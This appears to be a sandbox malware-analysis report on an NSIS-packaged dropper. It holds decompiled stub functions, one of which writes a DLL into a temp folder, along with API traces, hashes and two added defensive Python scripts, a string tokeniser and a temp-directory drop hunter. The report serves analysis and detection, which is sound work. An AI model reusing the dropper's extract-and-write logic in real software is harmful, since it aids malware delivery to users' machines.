            Instruction addresses for the statements above, in listing order (0x00000000 where the tool assigned none): 0x004059e8, 0x004059ef, 0x00405a00, 0x00405a00, 0x00405a0a, 0x00405a0c, 0x00405a13, 0x00405a1b, 0x00405a21, 0x00405a24, 0x00405a24, 0x00405bd5, 0x00405bd5, 0x00405bd9, 0x00405bdc, 0x00000000, 0x00000000, 0x00405a31, 0x00405a37, 0x00000000, 0x00000000, 0x00405a3d, 0x00405a3e, 0x00405a41, 0x00405bc8, 0x00405bd2, 0x00405bd4, 0x00405bd4, 0x00405bca, 0x00405bcc, 0x00405bce, 0x00405bcf, 0x00405bcf, 0x00000000, 0x00405bc8, 0x00405a47, 0x00405a4b, 0x00405a5b, 0x00405a62, 0x00405a65, 0x00405a68, 0x00405a6a, 0x00405a6d, 0x00405a70, 0x00405a71, 0x00405a75, 0x00405a78, 0x00405b73, 0x00405b77, 0x00405ba7, 0x00405bab, 0x00405bb0, 0x00405bb4, 0x00405bb4, 0x00405bb9, 0x00405bbf, 0x00405bc1, 0x00000000, 0x00405bc1, 0x00405b79, 0x00405b7c, 0x00405b91, 0x00405b98, 0x00405b7e, 0x00405b85, 0x00405b85, 0x00405ba0, 0x00405ba3, 0x00405b6b, 0x00405b6c, 0x00405b6c, 0x00000000, 0x00405ba3, 0x00405a7e, 0x00405a82, 0x00405a87, 0x00405a88, 0x00405a8b, 0x00405a96, 0x00405a99, 0x00405a9c, 0x00405ab5, 0x00405ab8, 0x00405ae5, 0x00405ae8, 0x00405af8, 0x00405afb, 0x00000000, 0x00000000, 0x00405b03, 0x00000000, 0x00405b03, 0x00405af0, 0x00000000, 0x00405af0, 0x00405aca, 0x00405acf, 0x00405ad2, 0x00000000, 0x00000000, 0x00405ade, 0x00000000, 0x00405a9e, 0x00405aae, 0x00405b09, 0x00405b09, 0x00405b0c, 0x00000000, 0x00000000, 0x00000000, 0x00405b0c, 0x00405a8d, 0x00405a8d, 0x00405b0e, 0x00405b0e, 0x00405b15, 0x00405b19, 0x00405b19, 0x00405b1a, 0x00405b1d, 0x00405b29, 0x00405b2f, 0x00405b31, 0x00405b50, 0x00405b50, 0x00000000, 0x00405b50, 0x00405b37, 0x00405b40, 0x00405b43, 0x00405b48, 0x00405b4c, 0x00000000, 0x00000000, 0x00405b53, 0x00405b53, 0x00405b53, 0x00405b57, 0x00405b5a, 0x00405b5c, 0x00405b60, 0x00405b66, 0x00405b66, 0x00405b60, 0x00000000, 0x00405b5a, 0x00405a8b, 0x00405be2, 0x00405bec, 0x00405bf8, 0x00405bf8, 0x00000000

            APIs
            • SHGetSpecialFolderLocation.SHELL32(00404D9A,00789938,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000), ref: 00405B29
            • SHGetPathFromIDListA.SHELL32(00789938,007A1F20), ref: 00405B37
            • lstrcatA.KERNEL32(007A1F20,00000000), ref: 00405B66
            • lstrlenA.KERNEL32(007A1F20,00000006,0079ED60,00000000,00404D9A,0079ED60,00000000,00000000,0078ED38,00789938), ref: 00405BBA
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FolderFromListLocationPathSpeciallstrcatlstrlen
            • String ID: C:\Program Files$CommonFilesDir$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
            • API String ID: 4227507514-3711765563
            • Opcode ID: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction ID: 88f6e72dca0f61d75e3a0e3e21e18f1b78018e843eea250326dc72cf64c4fd20
            • Opcode Fuzzy Hash: bb177ee3615b619df9c73ca70b65f722049f4b351553e2cdd88049d5eba40c88
            • Instruction Fuzzy Hash: 20512671904A44AAEB206B248C84B7F3B74EB52324F20823BF941B62C2D77C7941DF5E
            Uniqueness

            Uniqueness Score: -1.00%
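
The loop in E004059E1 above is the stub's string expander: bytes up to 0xfb are copied, 0xfc escapes the byte that follows, and 0xfd/0xfe/0xff each consume a two-byte operand whose low seven bits form a 14-bit index (a 1024-byte variable slot at 0x7a4000 + (index << 10), a pair of CSIDL folder codes resolved through the registry or SHGetSpecialFolderLocation, or a negative offset handled by the recursive call). Output stops at 0x400 bytes, index 0x1b is emitted as a number, and slots 21..26 plus every shell-folder result are passed through E00405BFB. The tokeniser below is an added example, not code from the report or from NSIS: it recovers that token structure so strings read out of the 0x7a2fb8 block in the memory dump can be annotated before being resolved. The labels "variable", "shell folder" and "language string", and the $INSTDIR-style names for the special-cased indices, are inferences from the decompiled behaviour and NSIS's public variable layout rather than facts the report states; the sample input is constructed.

```python
"""Tokeniser for the packed string format that E004059E1 expands.
Added example, not code from the report or from NSIS. It recovers token
structure only; resolving tokens needs the live variable table at 0x7a4000,
the registry and the shell, none of which this page includes."""
from dataclasses import dataclass
from typing import List, Union

# Escape bytes as handled by E004059E1; the role names are inferred labels.
ESC_SKIP, ESC_VAR, ESC_SHELL, ESC_LANG = 0xFC, 0xFD, 0xFE, 0xFF
OUT_LIMIT = 0x400            # the loop stops once 0x400 output bytes exist
CSIDL_FLAG_CREATE = 0x8000   # bit OR'ed into the two CSIDL candidates
VAR_HWNDPARENT = 0x1B        # index 27 is emitted as a number (E0040591D)
PATH_VARS = range(21, 27)    # slots 21..26 are passed through E00405BFB
# Names assumed from NSIS's public variable layout; the report shows numbers only.
VAR_NAMES = {21: "$INSTDIR", 22: "$OUTDIR", 23: "$EXEDIR", 24: "$LANGUAGE",
             25: "$TEMP", 26: "$PLUGINSDIR", 27: "$HWNDPARENT"}
SHELL_DIRECT = {0x24: "GetWindowsDirectory", 0x25: "GetSystemDirectory",
                0x26: "HKLM ProgramFilesDir (default C:\\Program Files)",
                0x2B: "HKLM CommonFilesDir"}
QUICKLAUNCH_SUFFIX = "\\Microsoft\\Internet Explorer\\Quick Launch"


@dataclass
class Var:
    index: int                   # 14-bit index; slot at 0x7a4000 + (index << 10)

    def describe(self) -> str:
        name = VAR_NAMES.get(self.index, f"VAR[{self.index}]")
        if self.index == VAR_HWNDPARENT:
            return f"{name} as decimal HWND"
        tag = " validated" if self.index in PATH_VARS else ""
        return f"{name} slot@0x{0x7A4000 + (self.index << 10):06x}{tag}"


@dataclass
class Shell:
    csidl_a: int                 # in[0]: switched on for 0x24/0x25/0x26/0x2b
    csidl_b: int                 # in[1]: value 4 appends the Quick Launch suffix

    def describe(self) -> str:
        how = SHELL_DIRECT.get(self.csidl_a)
        if how is None:
            # Up to four candidates (two when the flag at 0x7a3004 is clear);
            # the decompiler leaves their exact order ambiguous.
            cands = [self.csidl_a | CSIDL_FLAG_CREATE, self.csidl_b | CSIDL_FLAG_CREATE,
                     self.csidl_a, self.csidl_b]
            how = "SHGetSpecialFolderLocation " + ",".join(hex(c) for c in cands)
        suffix = QUICKLAUNCH_SUFFIX if self.csidl_b == 4 else ""
        return f"SHELL {how}{suffix} validated"


@dataclass
class LangString:
    index: int                   # expanded by the recursive call with offset -1-index

    def describe(self) -> str:
        return f"LANG[{self.index}] (offset {-1 - self.index})"


Token = Union[bytes, Var, Shell, LangString]   # bytes = a run of literal text


def decode(data: bytes, offset: int = 0) -> List[Token]:
    """Tokenise one packed string starting at data[offset]."""
    tokens: List[Token] = []
    lit = bytearray()
    produced, i = 0, offset
    while i < len(data) and produced < OUT_LIMIT:
        c = data[i]
        i += 1
        if c == 0:
            break
        if c <= ESC_SKIP:                       # literal, or 0xfc + escaped byte
            if c == ESC_SKIP:
                if i >= len(data):
                    break
                c, i = data[i], i + 1
            lit.append(c)
            produced += 1
            continue
        if i + 1 >= len(data):                  # truncated two-byte operand
            break
        b0, b1 = data[i], data[i + 1]
        i += 2
        idx = ((b1 & 0x7F) << 7) | (b0 & 0x7F)
        if lit:
            tokens.append(bytes(lit))
            lit = bytearray()
        tokens.append(Var(idx) if c == ESC_VAR else
                      Shell(b0, b1) if c == ESC_SHELL else LangString(idx))
        produced += 1                           # real count is lstrlen of the expansion
    if lit:
        tokens.append(bytes(lit))
    return tokens


def render(tokens: List[Token]) -> str:
    """Readable form for annotating strings pulled from the memory dump."""
    return "".join(t.decode("latin-1") if isinstance(t, bytes) else f"<{t.describe()}>"
                   for t in tokens)


# Constructed sample, not taken from the report.
SAMPLE = (b"Hello " + bytes([ESC_SHELL, 0x1A, 0x23]) + b"\\app"
          + bytes([ESC_SKIP, 0xFD]) + bytes([ESC_VAR, 0x1B, 0x00]) + b"\x00tail")

if __name__ == "__main__":
    print(render(decode(SAMPLE)))
```

Resolution is deliberately left out; the point of tokenising first is to see which parts of an expanded string came from a variable slot (and whether that slot is one the stub sanitises) and which came from a shell folder, which is what you need when tracing how the output directory for the dropped DLL was built.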

            C-Code - Quality: 32%
            			E004026FA() {
            				void* _t23;
            				void* _t28;
            				long _t33;
            				struct _OVERLAPPED* _t48;
            				void* _t51;
            				void* _t53;
            				void* _t54;
            				CHAR* _t55;
            				void* _t58;
            				void* _t59;
            				void* _t60;
            
            				 *((intOrPtr*)(_t60 - 0x34)) = 0xfffffd66;
            				_t54 = E00402A9A(_t48);
            				_t23 = E00405538(_t54);
            				_push(_t54);
            				if(_t23 == 0) {
            					lstrcatA(E004054CC(E004059BF("C:\Users\jones\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll", "C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
            					_t55 = 0x40a018;
            				} else {
            					_push(0x40a018);
            					E004059BF();
            				}
            				E00405BFB(_t55);
            				_t28 = E00405690(_t55, 0x40000000, 2);
            				 *(_t60 + 8) = _t28;
            				if(_t28 != 0xffffffff) {
            					_t33 =  *0x7a2f8c;
            					 *(_t60 - 0x2c) = _t33;
            					_t53 = GlobalAlloc(0x40, _t33);
            					if(_t53 != _t48) {
            						E004030FF(_t48);
            						E004030CD(_t53,  *(_t60 - 0x2c));
            						_t58 = GlobalAlloc(0x40,  *(_t60 - 0x1c));
            						 *(_t60 - 0x30) = _t58;
            						if(_t58 != _t48) {
            							_push( *(_t60 - 0x1c));
            							_push(_t58);
            							_push(_t48);
            							_push( *((intOrPtr*)(_t60 - 0x20)));
            							E00402EBD();
            							while( *_t58 != _t48) {
            								_t59 = _t58 + 8;
            								 *(_t60 - 0x38) =  *_t58;
            								E00405670( *((intOrPtr*)(_t58 + 4)) + _t53, _t59,  *_t58);
            								_t58 = _t59 +  *(_t60 - 0x38);
            							}
            							GlobalFree( *(_t60 - 0x30));
            						}
            						WriteFile( *(_t60 + 8), _t53,  *(_t60 - 0x2c), _t60 - 0x44, _t48);
            						GlobalFree(_t53);
            						_push(_t48);
            						_push(_t48);
            						_push( *(_t60 + 8));
            						_push(0xffffffff);
            						 *((intOrPtr*)(_t60 - 0x34)) = E00402EBD();
            					}
            					CloseHandle( *(_t60 + 8));
            					_t55 = 0x40a018;
            				}
            				_t51 = 0xfffffff3;
            				if( *((intOrPtr*)(_t60 - 0x34)) < _t48) {
            					_t51 = 0xffffffef;
            					DeleteFileA(_t55);
            					 *((intOrPtr*)(_t60 - 4)) = 1;
            				}
            				_push(_t51);
            				E00401428();
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t60 - 4));
            				return 0;
            			}
            Instruction addresses for the statements above, in listing order: 0x004026fb, 0x00402707, 0x0040270a, 0x00402711, 0x00402712, 0x00402737, 0x0040273c, 0x00402714, 0x00402719, 0x0040271a, 0x0040271a, 0x00402742, 0x0040274f, 0x00402757, 0x0040275a, 0x00402760, 0x0040276e, 0x00402773, 0x00402777, 0x0040277a, 0x00402783, 0x0040278f, 0x00402793, 0x00402796, 0x00402798, 0x0040279b, 0x0040279c, 0x0040279d, 0x004027a0, 0x004027bf, 0x004027ac, 0x004027b4, 0x004027b7, 0x004027bc, 0x004027bc, 0x004027c6, 0x004027c6, 0x004027d8, 0x004027df, 0x004027e5, 0x004027e6, 0x004027e7, 0x004027ea, 0x004027f1, 0x004027f1, 0x004027f7, 0x004027fd, 0x004027fd, 0x00402807, 0x00402808, 0x0040280c, 0x0040280e, 0x00402814, 0x00402814, 0x0040281b, 0x004021e8, 0x00402932, 0x0040293e

            APIs
            • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402737
            • GlobalAlloc.KERNEL32(00000040,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 00402771
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040278D
            • GlobalFree.KERNEL32 ref: 004027C6
            • WriteFile.KERNEL32(?,00000000,?,?), ref: 004027D8
            • GlobalFree.KERNEL32 ref: 004027DF
            • CloseHandle.KERNEL32(?), ref: 004027F7
            • DeleteFileA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,40000000,00000002,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,C:\Users\user\AppData\Local\Temp,00000000,00000000), ref: 0040280E
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Global$AllocFileFree$CloseDeleteHandleWritelstrcatlstrcpyn
            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 3508600917-1015288780
            • Opcode ID: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction ID: 0812298b90ecd2d5aad5402bcd4d52469fb6612ace7046921d2b432afa3f8679
            • Opcode Fuzzy Hash: d89732e6fba566c184c8790af0f9760d3bcc362a7ab7685eaae326e05ea9e627
            • Instruction Fuzzy Hash: 1631CD71C01618BBDB116FA5CE89DAF7A38EF45324B10823AF914772D1CB7C5D019BA9
            Uniqueness

            Uniqueness Score: -1.00%
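
E004026FA above is the extract-and-write step of the stub: it builds the output path inside the installer's temporary directory (here C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll), opens it through the helper E00405690 with access 0x40000000 and disposition 2 (GENERIC_WRITE, CREATE_ALWAYS), fills a GlobalAlloc buffer from the compressed data block (E00402EBD and the chunk-copy loop), writes it with WriteFile, closes the handle, and if anything failed deletes the file again with DeleteFileA and reports -17 (0xffffffef) instead of the default -13. The script below is an added hunting example, not code from the report: it runs over constructed key=value file events (not captured telemetry; map the fields onto Sysmon Event ID 11/23 or your EDR's file telemetry) and lists executables written into an NSIS-style temp directory, noting whether the writing process deleted them again, which is that error path, or left them on disk. The directory pattern (ns, one letter, hex digits, .tmp) is generalised from the single name in this report and from NSIS's temp-directory naming, so treat it as an assumption; benign NSIS installers produce the same events, so this is a triage signal to correlate with what the DLL does next, not a verdict.

```python
"""Hunting helper for the drop seen in E004026FA: an executable written into
the NSIS temp directory under %TEMP%, deleted again by the same process
when the write fails.

Added example, not code from the report. Input is a constructed key=value
event format; map the fields onto Sysmon Event ID 11/23 or your EDR's file
telemetry before use."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# NSIS names its temp directory ns + letter + hex digits + .tmp; this report
# shows nsn2692.tmp. The pattern is an assumption generalised from that.
NSIS_TEMP_DIR = re.compile(r"\\Temp\\ns[a-z][0-9a-f]{1,4}\.tmp\\([^\\]+)$", re.I)
EXEC_EXT = (".dll", ".exe")


@dataclass
class FileEvent:
    seq: int
    pid: int
    image: str    # process that performed the operation
    op: str       # "create" or "delete"
    target: str   # file path


def parse_event(line: str) -> FileEvent:
    """Parse one key=value line; values containing spaces are double-quoted."""
    fields: Dict[str, str] = {k: v.strip('"')
                              for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}
    return FileEvent(int(fields["seq"]), int(fields["pid"]), fields["image"],
                     fields["op"].lower(), fields["target"])


def nsis_temp_drops(events: Iterable[FileEvent]) -> List[dict]:
    """One record per executable created inside an NSIS temp directory, with
    the outcome: deleted again by the writer (the error path at the end of
    E004026FA, return code 0xffffffef) or left on disk."""
    ordered = sorted(events, key=lambda e: e.seq)
    hits: List[dict] = []
    for ev in ordered:
        m = NSIS_TEMP_DIR.search(ev.target)
        if ev.op != "create" or m is None or not m.group(1).lower().endswith(EXEC_EXT):
            continue
        deleted = any(o.op == "delete" and o.pid == ev.pid and o.seq > ev.seq
                      and o.target.lower() == ev.target.lower() for o in ordered)
        hits.append({"pid": ev.pid, "image": ev.image, "path": ev.target,
                     "outcome": "deleted (write failed)" if deleted else "left on disk"})
    return hits


# Constructed telemetry modelled on the paths in this report; not captured data.
SAMPLE_LOG = r"""
seq=1 pid=4120 image="C:\Users\user\Desktop\nanocore.exe" op=create target="C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll"
seq=2 pid=4120 image="C:\Users\user\Desktop\nanocore.exe" op=create target="C:\Users\user\AppData\Local\Temp\nsn2692.tmp\plugin.dll"
seq=3 pid=4120 image="C:\Users\user\Desktop\nanocore.exe" op=delete target="C:\Users\user\AppData\Local\Temp\nsn2692.tmp\plugin.dll"
seq=4 pid=2210 image="C:\Windows\explorer.exe" op=create target="C:\Users\user\AppData\Local\Temp\notes.txt"
seq=5 pid=4120 image="C:\Users\user\Desktop\nanocore.exe" op=create target="C:\Users\user\AppData\Local\Temp\nsn2692.tmp\readme.txt"
"""


def scan(log_text: str) -> List[dict]:
    """Parse a whole log and return the NSIS temp-directory drops it contains."""
    return nsis_temp_drops(parse_event(l) for l in log_text.splitlines() if l.strip())


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The delete correlation is what separates the stub's own failure handling from later cleanup: a create followed by a delete from the same PID means the write failed (the -17 path), whereas a DLL that stays on disk is the one to pull and analyse, as the report does for 4rmzuajr4dtt.dll.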

            C-Code - Quality: 94%
            			E00404D62(CHAR* _a4, CHAR* _a8) {
            				struct HWND__* _v8;
            				signed int _v12;
            				CHAR* _v32;
            				long _v44;
            				int _v48;
            				void* _v52;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				CHAR* _t26;
            				signed int _t27;
            				CHAR* _t28;
            				long _t29;
            				signed int _t39;
            
            				_t26 =  *0x7a2764;
            				_v8 = _t26;
            				if(_t26 != 0) {
            					_t27 =  *0x4092a0; // 0x6
            					_v12 = _t27;
            					_t39 = _t27 & 0x00000001;
            					if(_t39 == 0) {
            						E004059E1(0, _t39, 0x79ed60, 0x79ed60, _a4);
            					}
            					_t26 = lstrlenA(0x79ed60);
            					_a4 = _t26;
            					if(_a8 == 0) {
            						L6:
            						if((_v12 & 0x00000004) != 0) {
            							_t26 = SetWindowTextA( *0x7a2748, 0x79ed60);
            						}
            						if((_v12 & 0x00000002) != 0) {
            							_v32 = 0x79ed60;
            							_v52 = 1;
            							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
            							_v44 = 0;
            							_v48 = _t29 - _t39;
            							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
            							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
            						}
            						if(_t39 != 0) {
            							_t28 = _a4;
            							 *((char*)(_t28 + 0x79ed60)) = 0;
            							return _t28;
            						}
            					} else {
            						_t26 =  &(_a4[lstrlenA(_a8)]);
            						if(_t26 < 0x800) {
            							_t26 = lstrcatA(0x79ed60, _a8);
            							goto L6;
            						}
            					}
            				}
            				return _t26;
            			}
            Instruction addresses for the statements above, in listing order (0x00000000 where the tool assigned none): 0x00404d68, 0x00404d74, 0x00404d77, 0x00404d7d, 0x00404d89, 0x00404d8c, 0x00404d8f, 0x00404d95, 0x00404d95, 0x00404d9b, 0x00404da3, 0x00404da6, 0x00404dc3, 0x00404dc7, 0x00404dd0, 0x00404dd0, 0x00404dda, 0x00404de3, 0x00404def, 0x00404df6, 0x00404dfa, 0x00404dfd, 0x00404e10, 0x00404e1e, 0x00404e1e, 0x00404e22, 0x00404e24, 0x00404e27, 0x00000000, 0x00404e27, 0x00404da8, 0x00404db0, 0x00404db8, 0x00404dbe, 0x00000000, 0x00404dbe, 0x00404db8, 0x00404da6, 0x00404e31

            APIs
            • lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
            • lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
            • lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
            • SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID: `y
            • API String ID: 2531174081-1740403070
            • Opcode ID: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction ID: cb3b45f852b3c740c34d3f7777c40130103cf21f354e3c75b2961a2ef6a5418a
            • Opcode Fuzzy Hash: edad6dc2de89f9ed618421ce26d5d36bc75d71d20e9e6f22415f143a986efb4b
            • Instruction Fuzzy Hash: 5C2160B1900118BBDB119F99DD85DDEBFA9FF45354F14807AFA04B6291C7398E40CBA8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405BFB(CHAR* _a4) {
            				char _t5;
            				char _t7;
            				char* _t15;
            				char* _t16;
            				CHAR* _t17;
            
            				_t17 = _a4;
            				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
            					_t17 =  &(_t17[4]);
            				}
            				if( *_t17 != 0 && E00405538(_t17) != 0) {
            					_t17 =  &(_t17[2]);
            				}
            				_t5 =  *_t17;
            				_t15 = _t17;
            				_t16 = _t17;
            				if(_t5 != 0) {
            					do {
            						if(_t5 > 0x1f &&  *((char*)(E004054F7("*?|<>/\":", _t5))) == 0) {
            							E00405670(_t16, _t17, CharNextA(_t17) - _t17);
            							_t16 = CharNextA(_t16);
            						}
            						_t17 = CharNextA(_t17);
            						_t5 =  *_t17;
            					} while (_t5 != 0);
            				}
            				 *_t16 =  *_t16 & 0x00000000;
            				while(1) {
            					_t16 = CharPrevA(_t15, _t16);
            					_t7 =  *_t16;
            					if(_t7 != 0x20 && _t7 != 0x5c) {
            						break;
            					}
            					 *_t16 =  *_t16 & 0x00000000;
            					if(_t15 < _t16) {
            						continue;
            					}
            					break;
            				}
            				return _t7;
            			}

            0x00405bfd
            0x00405c05
            0x00405c19
            0x00405c19
            0x00405c1f
            0x00405c2c
            0x00405c2c
            0x00405c2d
            0x00405c2f
            0x00405c33
            0x00405c35
            0x00405c3e
            0x00405c40
            0x00405c5a
            0x00405c62
            0x00405c62
            0x00405c67
            0x00405c69
            0x00405c6b
            0x00405c6f
            0x00405c70
            0x00405c73
            0x00405c7b
            0x00405c7d
            0x00405c81
            0x00000000
            0x00000000
            0x00405c87
            0x00405c8c
            0x00000000
            0x00000000
            0x00000000
            0x00405c8c
            0x00405c91

            APIs
            • CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
            • CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
            • CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
            • CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            Strings
            • *?|<>/":, xrefs: 00405C43
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BFB, 00405BFC
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405C37
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Char$Next$Prev
            • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
            • API String ID: 589700163-562438032
            • Opcode ID: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction ID: 741f4f1766c378bb4ac774d7bbda26dd0b1b0e4f9567a31439ebc024b01f0e93
            • Opcode Fuzzy Hash: c3e6b7e6cb13a4bbd62a9e478f04b3777cedf0421140d3393f81b5e1ccfcad21
            • Instruction Fuzzy Hash: 7B11D05180CB9429FB3216284D44BBB7B98CB9B760F18047BE9C4722C2D67C5C828B6D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00403E0E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
            				struct tagLOGBRUSH _v16;
            				long _t35;
            				long _t37;
            				void* _t40;
            				long* _t49;
            
            				if(_a4 + 0xfffffecd > 5) {
            					L15:
            					return 0;
            				}
            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
            				if(_t49 == 0) {
            					goto L15;
            				}
            				_t35 =  *_t49;
            				if((_t49[5] & 0x00000002) != 0) {
            					_t35 = GetSysColor(_t35);
            				}
            				if((_t49[5] & 0x00000001) != 0) {
            					SetTextColor(_a8, _t35);
            				}
            				SetBkMode(_a8, _t49[4]);
